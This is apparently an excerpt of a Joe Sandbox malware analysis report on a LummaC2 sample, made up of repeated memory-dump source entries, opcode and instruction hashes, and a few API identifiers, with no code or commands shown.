                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51c94539ea6f2930231b92e30ee664c243044a8bcfc5153bcbf8975c1b9cbc82
                                              • Instruction ID: 906ea00b096cfae8f6ec0e81857aeeb546f716c125b6f105a4892a18807dc9b6
                                              • Opcode Fuzzy Hash: 51c94539ea6f2930231b92e30ee664c243044a8bcfc5153bcbf8975c1b9cbc82
                                              • Instruction Fuzzy Hash: 335166725483585FD7268F3888407EBBBD09F81318F19862CE8A99B2C1D770ED48C3D2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c896d43e73822df6aedc6ebe6dcd7c560645028e232a5df2a20eb5b81e4e7d5
                                              • Instruction ID: e2aa2efa34d7be649db5fbb35b93ebcbb6ae122c06fe13faee9eeee4dc74f977
                                              • Opcode Fuzzy Hash: 3c896d43e73822df6aedc6ebe6dcd7c560645028e232a5df2a20eb5b81e4e7d5
                                              • Instruction Fuzzy Hash: 18512332B49A804BE338893D4C612AA7E934BD3334B2DDB7EE1F2973E5D56548468350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88c60ca6edbf858cd5bcbdf64b1ba0810bb421244924eebe0dbab3ef6184fcd5
                                              • Instruction ID: 6675c5caef696dfae1cb70752b134695fbf9f13eb489127e57cd2c260672e973
                                              • Opcode Fuzzy Hash: 88c60ca6edbf858cd5bcbdf64b1ba0810bb421244924eebe0dbab3ef6184fcd5
                                              • Instruction Fuzzy Hash: 7F515CB16087548FE314DF29D89475BBBE1FBC8318F144A2DE5E997350E379DA088B82
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0efe513d3781f6b93adda7a3809799019f4a506c4ab47b93e8b3330cbae32a7
                                              • Instruction ID: fde44b76ec58eae7174edfd90fd32b86a3ab5f5f99c8f78a2ec00f43c304bffd
                                              • Opcode Fuzzy Hash: a0efe513d3781f6b93adda7a3809799019f4a506c4ab47b93e8b3330cbae32a7
                                              • Instruction Fuzzy Hash: 2F511622A4D9F04BD338953D6C613AABE834BD7334B2CA7ADE5F1A73E1D5658C058340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8d6f4135206b34271914b3d3b1e9ee8c6c5675885a36fc5c3fa7c687ccaa27d2
                                              • Instruction ID: 74ace58705a018b964a16b0a4daf5aab9c824ae17535e53e4d6720d9d16d168a
                                              • Opcode Fuzzy Hash: 8d6f4135206b34271914b3d3b1e9ee8c6c5675885a36fc5c3fa7c687ccaa27d2
                                              • Instruction Fuzzy Hash: B8412933A542568FD328CB29DC40B7AB7A3ABC8314F59C66CD999D73C5E3389C048791
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87540ad4b299ceef8dbccc3186a9b1f2ece6b0a4b770625da2d02bf3b1c8b6b0
                                              • Instruction ID: 7f8dfe134de6297545345cfe0b1f08e4fb62314d46e4b03e8dd3e6e337313797
                                              • Opcode Fuzzy Hash: 87540ad4b299ceef8dbccc3186a9b1f2ece6b0a4b770625da2d02bf3b1c8b6b0
                                              • Instruction Fuzzy Hash: 794126729082915BD309CF398450727FFE69BE2304F2CE5AEE4C1A73A2DB7488458792
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4634e592a77d99470ce8aedb85c8ed404f4dc779cbd21d9aa816c76dea37d90f
                                              • Instruction ID: 581248bd3e210a1ff353bbff47ff3933a47285dc1cc475d997ff6c1f6d1d0d91
                                              • Opcode Fuzzy Hash: 4634e592a77d99470ce8aedb85c8ed404f4dc779cbd21d9aa816c76dea37d90f
                                              • Instruction Fuzzy Hash: 0041C2327082194BCB248E6DCD902BAFAD3AFC4344F1EC679E9C5D7346D534D9109BA0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cda7fdd38f47feeed4e07a2c5b1df403cad31590fc4e6c333b39601136bce61b
                                              • Instruction ID: e1bd767466fcfffaf9543bcfeef477364184b0a14b495bca1c5782152ef5f088
                                              • Opcode Fuzzy Hash: cda7fdd38f47feeed4e07a2c5b1df403cad31590fc4e6c333b39601136bce61b
                                              • Instruction Fuzzy Hash: 6141B737B215144BE714CA25CC483A632D39BD9338F3FCAB8D529DB796D93799138680
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9cbd6b141bab38eba2ea0845161330c0466be2fbbea08cdf6dec7f1506e69ba0
                                              • Instruction ID: d9b938f130eed2a66169cb6237ef90387439e73c3c90fc21394a06c2bd5d0b1d
                                              • Opcode Fuzzy Hash: 9cbd6b141bab38eba2ea0845161330c0466be2fbbea08cdf6dec7f1506e69ba0
                                              • Instruction Fuzzy Hash: 8831EAB1A043246BE724AA24FC45B7BBBA4EF91758F10682CF88677391E231ED048752
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7b3ff9051ffa9489301555f113d502ca40109dc36581cf5426162d7e61372c07
                                              • Instruction ID: bdd2b3457ea64dd4118acc0134ad4869b39aa4d7ba2ab0ab58a08a1f5caf0d47
                                              • Opcode Fuzzy Hash: 7b3ff9051ffa9489301555f113d502ca40109dc36581cf5426162d7e61372c07
                                              • Instruction Fuzzy Hash: CD314D70208211AFE7189B29AC4563777A1EFC5329F28962CF7D6B32E4E370AC54D651
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 356eae5dc4eff8cb98ad6f9ebf9398660c483875863124a4a2e873a7c4882305
                                              • Instruction ID: efdb464ea1887d352d5559c6434417e9c1045efb4f5689a795652204a96bf0d2
                                              • Opcode Fuzzy Hash: 356eae5dc4eff8cb98ad6f9ebf9398660c483875863124a4a2e873a7c4882305
                                              • Instruction Fuzzy Hash: 52313D3260C3784FC71D9D7C985026FBA92ABC6324F1E863EE9A2573C5D930984153C1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 585e85f2439c89bb6021da13fc680eca8bb260db2b8241e70ea46babf259e995
                                              • Instruction ID: 32bf004523a3ca3db989b965f566b3effad3d68d8bfdf76bb5f129cb55df0687
                                              • Opcode Fuzzy Hash: 585e85f2439c89bb6021da13fc680eca8bb260db2b8241e70ea46babf259e995
                                              • Instruction Fuzzy Hash: 7F417022608BC28AD315CA3C8844346FF926BA6224F0DC7D8D1F98F3D3D665C5C5C791
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f388ec8ca4c9499514c587f92796e8421fe210a83ba486a5d0c5abfa38a1b26e
                                              • Instruction ID: ed59cbdcdd6d793917abcb5fead9be3969be2e354ed4d948d323f84a58e88c89
                                              • Opcode Fuzzy Hash: f388ec8ca4c9499514c587f92796e8421fe210a83ba486a5d0c5abfa38a1b26e
                                              • Instruction Fuzzy Hash: 3731F53A51C3509AE3088F20E42976BF7E2EF91314F14D92DD489972D1E7B5C84AC786
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: jA?2
                                              • API String ID: 2610073882-2492355632